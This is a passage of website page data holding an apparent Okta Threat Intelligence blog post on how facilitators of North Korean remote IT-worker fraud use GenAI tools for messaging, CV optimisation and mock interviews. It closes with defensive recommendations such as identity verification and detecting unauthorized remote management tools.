constitute legal advice. It is provided for informational purposes only. For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://asqula.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"asqula.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"}},{"updatedAt":"2025-07-31T03:58:06.450Z","slug":"/articles/2025/04/GenAIDPRK","node_locale":"en","date":"2025-04-24T22:00","secAuthor":[{"name":"Okta Threat Intelligence","slug":"/hackers/oti","jobTitle":null,"id":"203ea27a-a295-5ec0-a53e-0ebe54e65cb9","bio":{"bio":""},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#f8f8f8","width":58,"height":58}}}],"title":"How AI services power the DPRK’s IT contracting scams ","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"Nobody does GenAI quite like a fake IT worker."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta Threat Intelligence conducted in-depth research into online services used by individuals identified by US authorities and trusted third parties as agents for the Democratic People’s Republic of Korea (DPRK).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our research finds that generative artificial intelligence (GenAI) is playing an integral role in how North Korean nationals gain employment in remote technical roles around the globe, in what some researchers refer to as “DPRK IT Workers” or “Wagemole” campaigns. \\n\\nGenAI is used to create compelling personas at numerous stages of the job application and interview process. Once employed, GenAI tools are also used to assist in maintaining multiple simultaneous roles to earn revenue for the state.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has observed multiple AI-enhanced services used to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Manage the communications of multiple personas and their numerous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Translate, transcribe and summarize communications\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Generate and critique CVs and cover letters \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conduct mock job interviews via chat and webcam\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Test and improve the likelihood of any given job application passing automated checks\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has also observed facilitator use of online shipping and logistics services. We hypothesise that these services are used to redirect company-issued devices to “laptop farms” operated by facilitators based in Western countries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Background\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/archives/opa/pr/fourteen-north-korean-nationals-indicted-carrying-out-multi-year-fraudulent-information\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"arrests and indictments\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have revealed the scale at which individuals operating on behalf of the DPRK have been mobilized into neighbouring countries to gain fraudulent employment in organizations across the globe.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The primary objective of these schemes is to raise funds for the DPRK and compensate for the significant financial sanctions applied to the North Korean regime. US agencies have also identified several outlier cases in which the access to systems provided for employment was used to facilitate espionage or data extortion.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The targets for these fraudulent schemes appear opportunistic and based on the availability of remote technical roles. The employers most at-risk are technology companies that are more likely to accept remote candidates for IT or software engineering roles, often on a contingent basis. However, these campaigns also extend to industry verticals well beyond the technology sector. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has worked with highly targeted customers and partners, with a view to developing preventative controls for this unique threat model. In the process, Okta has revised our own onboarding processes, shared awareness collateral and built out numerous methods of detection. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The research had a direct influence on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"feature enhancements\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" built into Okta Workforce Identity, such as ID verification services, that Okta customers can use to reduce their exposure to this threat. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Facilitators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our understanding of this threat is shaped by the unique insight Okta Threat Intelligence can glean into the tools used by those individuals identified as “facilitators” of fraudulent employment schemes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These facilitators provide the necessary in-country support, technical infrastructure and/or legitimate business cover to help individuals from sanctioned countries gain and maintain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators already apprehended by law enforcement in the United States are alleged to have knowingly provided a range of support services to DPRK nationals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Direct assistance in the recruitment process\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A domestic address for the shipment of company-issued devices\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to legitimate identity documents\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Operating company-issued devices on the remote worker’s behalf\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Installing remote management and monitoring (RMM) tools on the device to facilitate the remote work\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticating, where necessary, on the remote worker’s behalf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One Arizona-based \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“laptop farm” operation\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" exposed in May 2024 is alleged to have assisted in the placement of over 300 individuals in technical positions across the United States. In another \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/opa/pr/two-north-korean-nationals-and-three-facilitators-indicted-multi-year-fraudulent-remote\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"January 2025 indictment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", two US residents were accused of fraudulently obtaining employment and operating a laptop farm in North Carolina for DPRK nationals, after they’d successfully gained employment at 64 organizations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta can now reveal for the first time the degree to which facilitators of fraudulent work schemes rely on emerging GenAI-enhanced services to scale their operations. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can read a comprehensive report into DPRK IT Worker fraud at the Okta Security Trust Center.\\nPrimary Security Contacts can sign-in to access threat advisories at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.asqula.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-enhanced tools\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In recent months, individuals strongly suspected to be DPRK-created personas \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.vidocsecurity.com/blog/deepfake-fraud-2/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"have been recorded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" using real-time “deepfake” video during interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence research has observed a far broader set of GenAI services used in these schemes, suggesting a very deliberate attempt by facilitators to keep pace with AI innovation. Facilitators are now using GenAI-based tools to optimize every step in the process of applying and interviewing for roles and to aid DPRK nationals attempting to maintain this employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using GenAI-based services specializing in:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unified messaging\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recruitment platforms\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Resume/CV screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidate management\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automated job screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-based chatbots\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI code training\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Online shipping\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta Threat Intelligence is not able to observe the facilitators’ activities beyond the login page, the narrow range of functionality offered by many of these tools allows us to hypothesize on some likely use cases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Unified messaging\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most demanding challenges for facilitators is how to manage multi-channel communications on behalf of dozens of candidates from sanctioned countries and their multiple personas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed the use of unified messaging services to manage many simultaneous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”. These GenAI-enhanced services are required to manage the scheduling of job interviews with multiple DPRK candidate personas by a small cadre of facilitators.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI in everything from tools that transcribe or summarize conversations, to real-time translation of voice and text.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Recruitment platforms\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators and candidates both make extensive use of jobseeking platforms to apply for roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More surprising was the use of AI-enhanced recruitment platforms typically used by recruiters (not candidates) to amplify the reach and accuracy of job postings.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to these tools provides facilitators opportunities to advertise roles at front companies that are similar, if not identical, to those advertised by targeted organizations, in order to study the cover letters and resumes of legitimate candidates. The CVs and cover letters from legitimate jobseekers may even form part of a training set for optimizing future applications made on behalf of DPRK nationals. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These same recruitment platforms provide access to the same applicant vetting systems (ATS) real employers use to narrow down the number of job applications a recruiter or hiring manager needs to manually review. Posting fake job advertisements would allow facilitators to examine what features presented in a job application are most likely to result in these AI-enhanced algorithms selecting a particular candidate over others. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At scale, these techniques dramatically improve the potential success of job applications, effectively using the recruiters own tools against them at scale.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Resume/CV screening\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that facilitators are highly motivated to generate successful cover letters, CVs and interviews and address any specific criteria in a given application. \\n\\nFacilitators were observed making use of services that provide “AI Superpowers” to job applicants to help them “outsmart employers’ robots”, in order to improve the chances of a job application successfully progressing past the automated CV/resume scans used in recruiting platforms.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These services use GenAI agents to test uploaded CVs against ATS (applicant tracking software), iterating until they achieve a better result and learning which personas will be more successful in any given role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Candidate management\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed services that use GenAI agents to automate the process of filling in application forms on behalf of candidates and to track the progress of candidates through the application process. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Again, these capabilities address the challenge of facilitating job applications and employment on behalf of multiple individuals and their multiple personas over multiple timezones.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5. Mock interviews\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once an application is successful, the next task for facilitators is to prepare their candidates (or the facilitator themselves, in some cases) for job interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using AI-enhanced services that deploy GenAI agents to host and record first-round interviews on behalf of employers, then critique and offer improvement tips for the interviewee. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These automated “AI-based webcam interview review” services claim to assist with the appropriate use of lighting, video filters, lighting and the candidate’s approach to conversation. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence assesses that mock interviews staged by AI agents can be used to evaluate the efficacy of deepfake overlays and of highly scripted answers to common questions, to decrease the chance of their ruse being discovered.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6. LLM-based chatbots\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While most of the GenAI applications used by facilitators relate directly to training and recruitment, Okta Threat Intelligence also observed them constantly signing into generic chatbots powered by large language models (LLMs).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Analyzing patterns of activity, these GenAI tools appear to be relied on heavily throughout the recruitment process, as well as by successful candidates once they gain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7. Code training services\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidates were also observed signing into free services that offer training in specific development languages and AI tools. These training platforms deliver a cursory awareness of unfamiliar development skills required by a hiring organization at interview, and the bare essentials required to maintain employment for as long as possible.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In short, DPRK facilitators are AI’s “power users”\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By extensively employing AI-enhanced tools, facilitators enable minimally skilled, non-native English-speaking workers to maintain software engineering positions long enough to channel earnings towards the sanctioned DPRK regime. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The scale of observed operations suggests that even short-term employment for a few weeks or months at a time can, when scaled with automation and GenAI , present a viable economic opportunity for the DPRK. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mitigating Controls\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To mitigate the threat posed by these campaigns, Okta Threat Intelligence recommends:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embedding \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Verification\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"key business processes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\",\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Training staff to identify common indicators of fraudulent behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting the unauthorized use of RMM (remote management and monitoring) tools\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can access a detailed set of recommendations and detection methods by selecting \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.asqula.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Liam Dermody, Tim Peel, Alex Tilley and David Zielezna contributed to this research.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"}}]}},"pageContext":{"limit":10,"skip":10,"numBlogPages":9,"currentPage":2}}, "staticQueryHashes": []}